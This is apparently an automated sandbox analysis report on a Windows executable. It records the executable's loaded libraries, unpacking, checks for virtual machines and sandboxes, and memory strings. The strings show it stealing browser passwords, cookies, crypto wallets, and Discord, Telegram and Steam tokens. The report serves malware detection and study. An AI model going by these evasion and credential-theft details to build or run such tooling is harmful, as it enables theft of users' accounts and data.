          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6704 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: msvcr100.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

          Data Obfuscation

          Source: C:\Users\user\Desktop\dZKPE9gotO.exeUnpacked PE file: 0.2.dZKPE9gotO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.00cfg:R;.reloc:R;
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeUnpacked PE file: 0.2.dZKPE9gotO.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CC858 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009CC858
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2EAB2 push ss; retf 0_2_00A2EABE
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2EC9D pushfd ; ret 0_2_00A2ED61
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2F42F push 64111D25h; ret 0_2_00A2F47F
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2F404 pushad ; ret 0_2_00A2F42E
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2F404 push 64111D25h; ret 0_2_00A2F47F
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2B64F push ebp; iretd 0_2_00A2B65A
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2E199 push ecx; retf 0_2_00A2E19F
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2B7E8 push esp; ret 0_2_00A2B807
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2ED07 pushfd ; ret 0_2_00A2ED61
          Source: dZKPE9gotO.exeStatic PE information: section name: .text entropy: 7.203655785812803

          Boot Survival

          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CC858 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009CC858
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: VMwareVM VMwareVMware VMwareVMware 0_2_00402BEB
          Source: dZKPE9gotO.exeBinary or memory string: DIR_WATCH.DLL
          Source: dZKPE9gotO.exe, 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
          Source: dZKPE9gotO.exeBinary or memory string: SBIEDLL.DLL
          Source: dZKPE9gotO.exeBinary or memory string: API_LOG.DLL
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-14873
          Source: C:\Windows\SysWOW64\timeout.exe TID: 8236Thread sleep count: 88 > 30
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040DE0C FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040DE0C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401825 EntryPoint,FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401825
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040CCF2 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040CCF2
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040B942 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,FindNextFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,0_2_0040B942
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040D820 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040D820
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C92FC GetProcessHeap,FindFirstFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009C92FC
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CAE0D SHGetFolderPathA,wsprintfA,FindFirstFileA,strcmp,strcmp,_mbscpy,_splitpath,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,0_2_009CAE0D
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C986A FindFirstFileA,StrCmpCA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009C986A
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C8952 FindFirstFileA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009C8952
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C42CC GetSystemInfo,0_2_009C42CC
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
          Source: dZKPE9gotO.exe, 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 12.1e411cf62bcba04d74fc6b505b9235404INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d 
%d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh
          Source: Amcache.hve.30.drBinary or memory string: VMware
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
          Source: dZKPE9gotO.exe, 00000000.00000002.2205161223.0000000000A6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
          Source: OPHDT2.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
          Source: OPHDT2.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
          Source: OPHDT2.0.drBinary or memory string: outlook.office.comVMware20,11696492231s
          Source: OPHDT2.0.drBinary or memory string: AMC password management pageVMware20,11696492231
          Source: Amcache.hve.30.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: dZKPE9gotO.exe, 00000000.00000003.1347088597.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2205161223.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWt
          Source: OPHDT2.0.drBinary or memory string: interactivebrokers.comVMware20,11696492231
          Source: OPHDT2.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
          Source: dZKPE9gotO.exe, 00000000.00000003.1347088597.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2205161223.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: OPHDT2.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
          Source: OPHDT2.0.drBinary or memory string: outlook.office365.comVMware20,11696492231t
          Source: Amcache.hve.30.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: OPHDT2.0.drBinary or memory string: discord.comVMware20,11696492231f
          Source: Amcache.hve.30.drBinary or memory string: vmci.sys
          Source: OPHDT2.0.drBinary or memory string: global block list test formVMware20,11696492231
          Source: chrome.exe, 0000000A.00000002.1563298280.00007824028F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=4964dfca-7e6f-4cd5-80d7-3178a81a3dc2
          Source: OPHDT2.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
          Source: OPHDT2.0.drBinary or memory string: bankofamerica.comVMware20,11696492231x
          Source: OPHDT2.0.drBinary or memory string: tasks.office.comVMware20,11696492231o
          Source: Amcache.hve.30.drBinary or memory string: VMware20,1
          Source: Amcache.hve.30.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.30.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.30.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: dZKPE9gotO.exe, 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMwareVMware
          Source: OPHDT2.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
          Source: Amcache.hve.30.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.30.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.30.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: OPHDT2.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
          Source: Amcache.hve.30.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.30.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.30.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
          Source: Amcache.hve.30.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
          Source: OPHDT2.0.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
          Source: OPHDT2.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
          Source: Amcache.hve.30.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
          Source: Amcache.hve.30.drBinary or memory string: VMware Virtual USB Mouse
          Source: OPHDT2.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
          Source: Amcache.hve.30.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.30.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.30.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.30.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
          Source: Amcache.hve.30.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.30.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: dZKPE9gotO.exeBinary or memory string: MwareVMware
          Source: msedge.exe, 0000000D.00000003.1609890374.0000399802550000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
          Source: OPHDT2.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
          Source: Amcache.hve.30.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.30.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: chrome.exe, 0000000A.00000002.1546857682.000001CC68DFB000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.1678570506.00000168C3C45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: OPHDT2.0.drBinary or memory string: dev.azure.comVMware20,11696492231j
          Source: OPHDT2.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
          Source: Amcache.hve.30.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.30.drBinary or memory string: \driver\vmci,\driver\pci
          Source: OPHDT2.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
          Source: dZKPE9gotO.exe, 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVM
          Source: Amcache.hve.30.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.30.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: OPHDT2.0.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
          Source: OPHDT2.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeAPI call chain: ExitProcess graph end nodegraph_0-14854
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeAPI call chain: ExitProcess graph end nodegraph_0-14923
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeAPI call chain: ExitProcess graph end nodegraph_0-15431
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CC858 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009CC858
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
